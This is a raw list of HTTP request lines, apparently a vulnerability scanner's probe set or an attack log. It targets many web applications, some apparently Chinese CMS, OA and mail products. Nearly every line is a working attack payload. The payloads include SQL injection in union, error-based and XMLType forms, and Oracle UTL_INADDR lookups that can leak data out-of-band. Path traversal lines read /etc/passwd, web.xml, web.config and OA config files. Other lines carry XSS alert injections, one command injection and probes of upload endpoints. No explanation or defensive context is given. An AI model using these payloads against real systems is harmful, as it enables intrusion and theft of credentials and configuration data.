GET /news/js.php?type=like&keyword=1%2527)/**/and/**/(select/**/1/**/from/**//**/(select/**/count(*),concat((select/**/concat(0x7e,0x7765627363616E3A693A66696E64,0x7e)/**/from/**/1tc_members/**/limit/**/0,1),floor(rand(0)*2))x/**/from/**//**/information_schema.tables/**/group/**/by/**/x)a)%23
POST /mod/payment/quest.php?op=check&page=b2b
POST /mod/ntga/jwsview.php
POST /uploadd.php
GET /jserr.php?jsstr=%3Cimg%20src=@%20onerror=alert(42873)%20/%3E
GET /admin/backup.aspx
POST /mod/mad/video_upload.php
GET /business/buildingrooms_xml.asp?cancelBldroomShow=2&client_buildID=1%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)&client_mainno=0&client_mainTable=unrelatedresource&client_realtypeID=-1&client_showMode=&client_showRoomCond=&client_stanID=1610&floorEnd=-100&floorStart=-100&functiontype=6&pmBldRoomID=undefined&roomNoEnd=-100&roomNoStart=-100&sid=
GET /SelNews.aspx?NewsType=DongTaiNewsType=1'%20and%201=char(106)%20--
GET /Website/OnlineSurveyResults.jsp?idhao=1'%20union%20all%20select%20null,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)%7C%7Cchr(60)%20from%20sysibm.sysdummy1--
POST /frontProduct/search.ac
GET /Website/contentshow.jsp?ColumnCode=-12'%20union%20all%20select%20CHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7CCHR(105)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)%20from%20DUAL%20--
GET /Website/newsshow.jsp?id=-12%20UNION%20%20ALL%20SELECT%20%20NULL,NULL,NULL,NULL,CHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7CCHR(105)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100),NULL,NULL,NULL,NULL%20FROM%20DUAL
GET /FileManages/NetworkDisk/QxSet1.aspx?id=38%20%20and+1=char(106)+--
GET /website/approve/convenientSiteAction!getSXList.action?department=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)%20--&mill=488&style=4
GET /website/approve/approveSiteAction!listApproveModel.action?action=search&forward=searchmodel&issueTypename=&style=4&subType=1%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)
GET /website/approve/approveSiteAction!findApproveGuide.action?businesscode=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)%20--&location=&subcode=000
GET /bookdetail.aspx?id=-311%20union%20all%20Select%208%2CCHAR%28119%29%2bCHAR%28101%29%2bCHAR%2898%29%2bCHAR%28115%29%2bCHAR%2899%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%2858%29%2bCHAR%28105%29%2bCHAR%2858%29%2bCHAR%28102%29%2bCHAR%28105%29%2bCHAR%28110%29%2bCHAR%28100%29%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8--
GET /znSearchAction.do?searchContext=-1%25%27%20UNION%20%20ALL%20SELECT%20%20NULL%2CNULL%2CCHR%28119%29%7C%7CCHR%28101%29%7C%7CCHR%2898%29%7C%7CCHR%28115%29%7C%7CCHR%2899%29%7C%7CCHR%2897%29%7C%7CCHR%28110%29%7C%7CCHR%2858%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7CCHR%28102%29%7C%7CCHR%28105%29%7C%7CCHR%28110%29%7C%7CCHR%28100%29%2CNULL%20FROM%20DUAL%20--
GET /opac/ckgc.jsp?kzh=-1')%20UNION%20%20ALL%20SELECT%20%20NULL,NULL,CHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7CCHR(105)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL--
GET /cms/framework/dbfile/createdbfile.jsp
HEAD /CN/item/downloadFile.jsp?filedisplay=../../web-inf/web.xml
GET /servlet/com.runqian.base.util.ReadJavaScriptServlet?file=../../../../../../../../../../etc/passwd
GET /FileManages/FolderQxSet/FileModify.aspx?type=2&fileid=3%20and+1=char(106)%20--&path=/1
GET /interface/ugo.php?OA_USER=aa%2527%20and%201=(select%201%20from(select%20count(*),concat(0x7c,0x484B3A693A31393937,0x7c,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x%20limit%200,1)a)%20and%20%25271%2527=%25271
GET /inc/finger/use_finger.php?USER_ID=-123%bf'%20and%20extractvalue(1,%20concat(0x5c,(select%200x5468696E6B3A693A646966666572656E74%20from%20%60user%60%20limit%201)))%23
GET /general/ems/query/search_excel.php?LOGIN_USER_ID=1%bf%27%20and%20extractvalue%281,%20concat%280x5c,%28select%200x5468696E6B3A693A646966666572656E74%20from%20%60user%60%20limit%201%29%29%29;%23&EMS_TYPE=1
GET /general/ems/manage/search_excel.php?LOGIN_USER_ID=1&EMS_TYPE=1%e5%27%20and%20extractvalue%281,%20concat%280x5c,%28select%200x5468696E6B3A693A646966666572656E74%20from%20%60user%60%20limit%201%29%29%29;%23
GET /backup/backup/backup.asp
GET /module/AIP/get_file.php?MODULE=/&ATTACHMENT_ID=.._webroot/inc/oa_config&ATTACHMENT_NAME=php
HEAD /general/mytable/intel_view/video_file.php?MEDIA_DIR=../../../inc/&MEDIA_NAME=oa_config.php
GET /admini/item/iteminfo.aspx
GET /admini/newstopic/newstopicinfo.aspx
HEAD /download?fileName=/WEB-INF/web.xml
GET /RecruitstuManage/schoolinfo/DetailTheme.aspx?type=-1&topicid=1'%20and%201=char(106)%20--
POST /index_lnlqcj.php
GET /main/model/childcatalog/fileFind.do?fcode=00103&title=-111%25%27%20union%20all%20select%20null%2CCHAR%2884%29%2bCHAR%2897%29%2bCHAR%28105%29%2bCHAR%2887%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%2858%29%2bCHAR%28103%29%2bCHAR%28111%29%2bCHAR%2858%29%2bCHAR%28104%29%2bCHAR%28111%29%2bCHAR%28109%29%2bCHAR%28101%29%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull--&Submit=%CB%D1%CB%F7
GET /scrp/feedbackdetail.cfm?iSno=1%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)
GET /poweb/CDHelp.jsp?ISOID=3'%20union%20all%20select%20null,null,null,null,null,null,null,null,null,null,null,null,null,null,char%28104%29%2bchar%28107%29%2bchar%2858%29%2bchar%2849%29%2bchar%2858%29%2bchar%2849%29%2bchar%2857%29%2bchar%2857%29%2bchar%2855%29,null,null,null%20%20--%20
POST /information/OA_InforList.asp
GET /information/OA_PingLun.asp?PLType=1&POAID=54'%20and+1=char(106)%20--
POST /information_manager/informationmanager_upload.jsp?upload=1&dispControl=null&saveControl=null
POST /public/jsp/multiuploadfile.jsp?path=information&mode=add&fileName=infoPicName&saveName=infoPicSaveName&tableName=infoPicTable&fileMaxSize=0&photos=null
POST /public/jsp/smartUploadPic.jsp?path=information&mode=add&fileName=infoPicName&saveName=infoPicSaveName&tableName=infoPicTable&fileMaxSize=0&fileMaxNum=0&fileType=gif,jpg,bmp,jspx,png&fileMinWidth=0&fileMinHeight=0&fileMaxWidth=0&fileMaxHeight=0
GET /jdwz/qtpage/findAllPoint.jsp?dtcxlb=vcsfjg&point_name=1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCHAR%2884%29%2bCHAR%2897%29%2bCHAR%28105%29%2bCHAR%2887%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%2858%29%2bCHAR%28103%29%2bCHAR%28111%29%2bCHAR%2858%29%2bCHAR%28104%29%2bCHAR%28111%29%2bCHAR%28109%29%2bCHAR%28101%29%2CNULL--%20&vcsfjg=all
GET /jdwz/newsAction.do?flag=flag&NewsId=-12'%20union%20all%20select%20CHAR%2884%29%2bCHAR%2897%29%2bCHAR%28105%29%2bCHAR%2887%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%2858%29%2bCHAR%28103%29%2bCHAR%28111%29%2bCHAR%2858%29%2bCHAR%28104%29%2bCHAR%28111%29%2bCHAR%28109%29%2bCHAR%28101%29,12,12,12,12,12,12,12,12--
GET /caigou/NoticeList.aspx?Type=%27%2b+(select+convert(int%2cCHAR(106)%2bCHAR(105)%2bCHAR(120))+FROM+syscolumns)+%2b%27
GET /MailExportDo.asp?dellist=-1234%29%20or%203438%3DCONVERT%28INT%2C%28SELECT%20CHAR%28119%29%2bCHAR%28101%29%2bCHAR%2898%29%2bCHAR%28115%29%2bCHAR%2899%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%2858%29%2b%28SELECT%20%28CASE%20WHEN%20%288986%3D8986%29%20THEN%20CHAR%28105%29%20ELSE%20CHAR%2848%29%20END%29%29%2bCHAR%2858%29%2bCHAR%28102%29%2bCHAR%28105%29%2bCHAR%28110%29%2bCHAR%28100%29%29%29%20%20AND%20%281602%3D1602
POST /mailClassInfor.asp
GET /MessageInfoDis.asp?VOID=26%20and%201122%3DCONVERT%28INT%2C%28SELECT%20CHAR%2884%29%2bCHAR%2897%29%2bCHAR%28105%29%2bCHAR%2887%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%2858%29%2bCHAR%28103%29%2bCHAR%28111%29%2bCHAR%2858%29%2bCHAR%28104%29%2bCHAR%28111%29%2bCHAR%28109%29%2bCHAR%28101%29%29%29%20--
GET /Include/DepartmentSet_Right.aspx?BI_ID=1'%20and%20(select%2b(char(106)%2bchar(120)%2bchar(106)%2bchar(120)))%3E0--
HEAD /jcms/m_1_9/user/down.jsp?pathfile=../jcms/m_1_9/user/down.jsp
GET /tophp.asp
POST /Manage/CalendarMemo/event.ashx
GET /RuvarHRM/web_common/file_download.aspx?hr_file_storage_id=1')%20and%20(select%20char(106)%2bchar(106))%3E0--
GET /SysManage/bbsSet/BoardInfo.aspx?board_id=-1'%20and%20(select%20char(106)%2bchar(106))%3E0--&level=1
GET /SysManage/include/SelectUnderling.aspx?u_underling=(select%20char(106)%2bchar(106)))--'
GET /SysManage/MailSet/select_mail.aspx?corp_id=(select%20char(106)%2bchar(106))%20--
GET /workflow/OfficeFileDownload.aspx?filename=1'%20and%20(select%20char(106)%2bchar(106))%3E0%20--
GET /SysManage/get_department.aspx?corpID=char(106)%2bchar(106)
GET /SysManage/role_setting_new.aspx?id=char(106)%2bchar(106)
GET /resource/jpk/search.jsp?coursetype=0&applyyear=0&university=%CF%C3%C3%C5%B4%F3%D1%A7&subject1=0&subject2=0&name=%25%27%20AND%201122%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%28104%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281122%3D1122%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2849%29%7C%7CCHR%2857%29%7C%7CCHR%2857%29%7C%7CCHR%2855%29%29%29%20FROM%20DUAL%29%20AND%20%27%25%27%3D%27
GET /oa/download_attach.aspx?attach_id=1'%20and%20(select%20char(106)%2bchar(106))%3E0--
GET /SysManage/departmentset_corpshow.aspx?bi_id=1'%20and%20(select%20char(106)%2bchar(106))%3E0--
GET /SysManage/role_show.aspx?role_id=char(106)%2bchar(106)
GET /lates/index.html?username=123%27%2f%2a%2a%2fand%2f%2a%2a%2f%28seleselectct%2f%2a%2a%2f1%2f%2a%2a%2ffrom%2f%2a%2a%2f%28selselectect%2f%2a%2a%2fcount%28%2a%29%2Cconcat%280x7c%2C0x7765627363616E3A693A66696E64%2C0x7c%2Cfloor%28rand%280%29%2a2%29%29x%2f%2a%2a%2ffrom%2f%2a%2a%2finformation_schema.tables%2f%2a%2a%2fgroup%2f%2a%2a%2fby%2f%2a%2a%2fx%29a%29%23
POST /kaoqin/JiaoYanDis.asp
GET /admin/accounts_list.aspx?u_department_id=1'%20and%20(char(106)%2bchar(106))%3E0--
GET /tj/list.aspx?typeid=1'%20and%20(char(106)%2bchar(106))%3E0--
GET /filemanage/FolderPower.aspx?folder=1'%20and%20(char(106)%2bchar(106))%3E0--
GET /OperationManage/ViewSecrecyGuestBookMessage.aspx?sn=-12'%20and%20(char(106)%2bchar(106))%3E0--&sp=amdin&oid=0&type=2
POST /Manage/CalendarMemo/load.ashx
GET /php/report/include/ldap.inc
GET /php/report/include/util.inc
GET /php/report/include/config.inc
GET /php/report/lastlogin_list_export.php?time=1%20and%201=2%20union%20select%20md5(1122),2,3%20--%20&stime=hehe
GET /user/storage_explore.php
GET /grad/admin/domain_logo.php
GET /user/storage_fold_explore.php
GET /php/mailaction1.php?action=x&index=1.2;echo+123456%3Ex1.txt
POST /user/send_queue/upload_addition.php
GET /php/report/search_lastlogin.php?time=1%20and%201=2%20union%20select%20md5(1122),2,3%20--%20&stime=hehe
GET /php/bill/list_userinfo.php?domain=site.org&ok=1&cp=1%20union%20select%20md5(1122),2,3,4,5%23
POST /grad/admin/admin_logo_upload.php
GET /common/codewidget.jsp?code=1'%20AND%201=char(106)%20--
HEAD /download.ashx?files=../web.config
GET /mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise
GET /?question/search/%27%75nion%20select%201,2,3,4,5,6,7,8,md5(1122),10,11,12,13,14,15,16,17,18,19,20%23
HEAD /jcms/m_1_9/user/down.jsp?abspathfile=/etc/passwd
GET /Edit/ShowEdit.aspx?Dir=../../&OpenWords=TxtTagKey
GET /jis/manage/databak/showlog.jsp?path=../showlog.jsp
HEAD /download.jsp?path=UserFiles/../download.jsp
GET /tt/trade/register.asp?step=checkdup&checkname=ologinname&checkval=haha'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)%20--&pk=0
GET /zwgkinfo/DepartMentInfoList.aspx?CategoryNum=-12'/**/and/**/1=char(106)--&DeptCode=
GET /jis/interface/offer.jsp?flag=user
HEAD /jis/down.jsp?pathfile=./down.jsp%00.jpg
GET /MockLogin.aspx
GET /mobile/user.php?act=order_list
GET /seeyon/management/status.jsp
HEAD /api/download.ashx?fid=nUDWEgdorSH4j/+9GiQTlA==
GET /monitoring?part=web.xml
GET /?/s_tag/hehe%25%27%20union%20select%201,2,3,md5(1122),5,6,7%20from%20go_admin%23
GET /download.action?fullPath=./WEB-INF/web.xml
GET /jcms/workflow/design/readxml.jsp?flowcode=../../../WEB-INF/config/dbconfig
POST /jis/update/update.jsp?fn_billstatus=U
GET /install/install.php
GET /public/minify.php?f=../ooxxooxxo/hehe.js
GET /admin/index.asp
GET /plus/outside.php?id=../template/default/style/yun_index.css%00
GET /productpic.aspx?id=100611)%20and%201=char(106)%20--
GET /jsp/util/file_download.jsp?filePath=../../../../../../../etc/passwd
GET /jsp/util/file_download.jsp?filePath=c:%5Cwindows%5Cwin.ini%00.xml
POST /jcms/m_5_5/m_5_5_3/import.jsp
POST /upload!uploadImg.action
GET /AuthReturn.aspx?APTokenResponse=a$8SOIYyiGVYBge5mdoY5nIeAueY7BixUtLdHqpy8o3RqM9hVnisaXAA==
POST /?do=index&mod=goods
GET /index.php/*123*/'union/**/select/**/1,2,3,4,5,6,7,8,md5(1122),10,11%23&action=getatlbyid
GET /cart.aspx?act=spikebuy&spikeid=3%20and%201=char(106)%2bchar(120)%20--
HEAD /webmail/client/mail/index.php?module=operate&action=down&file=./../../mainconfig.php
GET /MoreIndex.aspx?pkId=6434&kw=a'%20and%201=char(106)%20--&st=2&t=1
GET /RuvarHRM/web_include/select_baseinfo.aspx?bt_name=1')%20%20and%20(char(106)%2bchar(106))%3E0--
GET /Default.aspx?item=1)%20and%201=(char(106)%2bchar(106))%20--
GET /news/searchNewsAction.shtml?keywords='%7C%7C(SELECT%20'ijx'%20FROM%20DUAL%20WHERE%201122=1122%20AND%204567=UTL_INADDR.GET_HOST_ADDRESS((SELECT%20chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)%20FROM%20dual)))%7C%7C'
GET /zwfw/zwfwInfoAction!execute.shtml?action=5&sid='%7C%7C(SELECT%20'ijx'%20FROM%20DUAL%20WHERE%201122=1122%20AND%204567=UTL_INADDR.GET_HOST_ADDRESS((SELECT%20chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)%20FROM%20dual)))%7C%7C'
GET /news/newsInfoAction.shtml?infotype=-1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)%20and%20'at'='at
GET /client/checkuser.aspx?user=test'%20and%20char(106)%3E0--&pwd=1
GET /siteserver/userRole/modal_sendMail.aspx?From=User&UserNameCollection=test'+and+char(106)%2bchar(106)=0%20--
GET /admin/include/config.php?depth=../../templates/default/images/css/metinfo.css%00
GET /admin/login/login_check.php?depth=../../templates/default/images/css/metinfo.css%00&admin_index=1
GET /admin/system/lang/lang.func.php?depth=../../../public/js/public.js%00
GET /webusr/check.aspx?loginname=nosec'%20and%201=char(106)%2bchar(106)%20--%20
POST /plugins/phpdisk_client/client_sub.php?action=upload_file
GET /ExhibitionCenter.aspx?area=-12'%20and/**/1=char(106)/**/--
GET /SupplyList.aspx?parentid=88&classid=-12%20and/**/1=char(106)/**/%20--%20
GET /company/SearchProducts.aspx?id=115&keyname=ppp%25'%20and/**/1=char(106)/**/%20--%20
POST /Web/Login.aspx
POST /Web/KeySearch.aspx?searchid=1234
GET /portal/admin/setright.aspx?id=-1
GET /infolist.aspx?ClassId=5)%20and%201122=CONVERT(INT,(SELECT%20CHAR(84)%2bCHAR(97)%2bCHAR(105)%2bCHAR(87)%2bCHAR(97)%2bCHAR(110)%2bCHAR(58)%2bCHAR(103)%2bCHAR(111)%2bCHAR(58)%2bCHAR(104)%2bCHAR(111)%2bCHAR(109)%2bCHAR(101)))%20AND%20(1=1
GET /guestbook.aspx?do=show&id=1%20union%20all%20select%20null,null,null,null,null,null,null,null,null,null,null,char(106)%2bchar(106)%2bchar(108)%20--
HEAD /prog/filedown.php?pe_id=MQ==
POST /emlib4/system/DataSource/GetDataGridCtrlResult.aspx?_debug_=undefined
GET /emlib4/format/release/aspx/eml_userwh.aspx
GET /voteresult.aspx?activeid=-1%20UNION%20SELECT%201,char(106)%2bchar(106),3,4,5%20from%20syscolumns%20--
GET /kbase_list.aspx?kcatid=1%20UNION%20SELECT%201,2,char(106)%2bchar(106),4,5,6,7,8%20from%20syscolumns--
GET /getTopLinksPortalCategoriesAction.action?siteId=../../../../../../../../../../windows/win.ini%00.jpg
GET /letter/letter_detail.aspx?id=8'%20%20and+1=char(106)%2bchar(106)%20--
GET /cms/infopub/rss.jsp?channelcode=-A%27%20union%20all%20select%20char%28106%29%2bchar%28106%29%2Cnull%2Cnull%2Cnull%20--&maxnum=20
GET /web/doc_hit.jsp?documentid=-21%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)
GET /OperationManage/BlogMoreIndex.aspx?pkId=&blogId=1&kw=abc'%20and%201=char(106)%20--&st=1&t=1
HEAD /Tools/stream/FlvStream.ashx?file=./Index.aspx
GET /tj/total.aspx?act=other&typeid=1%27%20AND%209518%3DCONVERT%28INT%2C%28SELECT%20char%28119%29%2bchar%28101%29%2bchar%2898%29%2bchar%28115%29%2bchar%2899%29%2bchar%2897%29%2bchar%28110%29%2bchar%2858%29%2bchar%28105%29%2bchar%2859%29%2bchar%28102%29%2bchar%28105%29%2bchar%28110%29%2bchar%28100%29%2b%28SELECT%20%28CASE%20WHEN%20%289518%3D9518%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%2bCHAR%28100%29%29%29%29%20AND%20%27xhJK%27%3D%27xhJK
GET /webConfigSet/configSetting.aspx?url=/login/index.aspx
GET /cms/cms/infopub/gjjs.jsp?pubtype=S&pubpath=dkt&startdate=&enddate=&topic=&content=&authorname=&origin=&description=&webappcode=A02&searchdir=A02&templetid=-21'%20union%20all%20select%20char(106)%2bchar(62)%2bchar(60),null,null%20--
POST /mydocument/download.aspx
GET /prog/get_passwd_1.php?user=hehe%3Cscript%3Ealert(42873)%3C/script%3E%20
GET /cjwtlist.aspx?t=(select+convert(int%2c@@version))
GET /FormBuilder/PrintFormList.aspx?file_id=1)/**/UNION/**/ALL/**/SELECT/**/CHR(97)%7C%7CCHR(60)%7C%7CCHR(99),NULL/**/FROM/**/DUAL/**/--
GET /module/sitesearch/index.jsp?keyword=&columnid=-1650)%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL--%20&keyvalue=&webid=&currpage=2
GET /FormBuilder/yjzxList.aspx?id=1/**/UNION/**/ALL/**/SELECT/**/NULL,NULL,CHR(106)%7C%7CCHR(60)%7C%7CCHR(106)/**/FROM/**/DUAL--
GET /FromBaoShan/LaborSpecial/PlacardView.aspx?info_id=1/**/UNION/**/ALL/**/SELECT/**/CHR(106)%7C%7CCHR(106)%7C%7CCHR(106),NULL,NULL,NULL/**/FROM/**/DUAL--
GET /goods/GoodsAdd.aspx?goodsid=1/**/AND/**/1122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)&flag=2
GET /pub/search/search_video_view.asp?id=3&mid=4%20and%201122=CONVERT(INT,(SELECT%20char%28119%29%2bchar%28101%29%2bchar%2898%29%2bchar%28115%29%2bchar%2899%29%2bchar%2897%29%2bchar%28110%29%2bchar%2858%29%2bchar%28105%29%2bchar%2859%29%2bchar%28102%29%2bchar%28105%29%2bchar%28110%29%2bchar%28100%29))&yh=1
POST /index.php?act=ajax&do=datacall&in_ajax=1&m=index&op=get_datacall
GET /main/findgbm2.asp?sql=SELECT+char%28106%29%2Bchar%28106%29%2Bchar%28106%29+FROM+Master%2E%2ESysDatabases+ORDER+BY+Name&sqlbak=SELECT+char%28106%29%2Bchar%28106%29%2Bchar%28106%29+FROM+Master%2E%2ESysDatabases+ORDER+BY+Name%20&px=
GET /ebsys/fceform/common/djframe.htm?isfile=release&djsn=eb_runsql
GET /nameedit.asp?table=bbs&id=1%20union%20all%20select%20null,null,null,null,char(119)%2bchar(101)%2bchar(98)%2bchar(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(58)%2bchar(105)%2bchar(59)%2bchar(102)%2bchar(105)%2bchar(110)%2bchar(100),null%20--&action=edit
GET /jis/front/sdgs/updateuser.jsp
HEAD /lm/down.jsp?pathfile=down.jsp
GET /website/dflz/dflzCjAction!caiwugk_list.action?orgCode=&orgName=&zuOrgCode=&zuOrgName=&cwgkbbh=-21'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)%20--%20&cwgkbmc=
GET /Documents/FolderInfor.asp?POAID=0'%20or%201122=CONVERT(INT,(SELECT%20char(119)%2bchar(101)%2bchar(98)%2bchar(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(58)%2bchar(105)%2bchar(59)%2bchar(102)%2bchar(105)%2bchar(110)%2bchar(100)))%20--&Source=0
GET /Documents/FolderInfor.asp?OAID=0%20or%201122=CONVERT(INT,(SELECT%20char(119)%2bchar(101)%2bchar(98)%2bchar(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(58)%2bchar(105)%2bchar(59)%2bchar(102)%2bchar(105)%2bchar(110)%2bchar(100)))%20--&Source=0
POST /meetingroom/MeetingRoom_UseInfo.asp
GET /lm/front/api/opr_datacall.jsp?fn_billstatus=E&vc_id=-12'%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,char(119)%2bchar(101)%2bchar(98)%2bchar(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(58)%2bchar(105)%2bchar(59)%2bchar(102)%2bchar(105)%2bchar(110)%2bchar(100),NULL,NULL,NULL,NULL,NULL--
HEAD /downloadFile.action?path=index.jsp
GET /portal/getJsonData.action?userId=9090&ruleID=portal-common.getProFileInfo
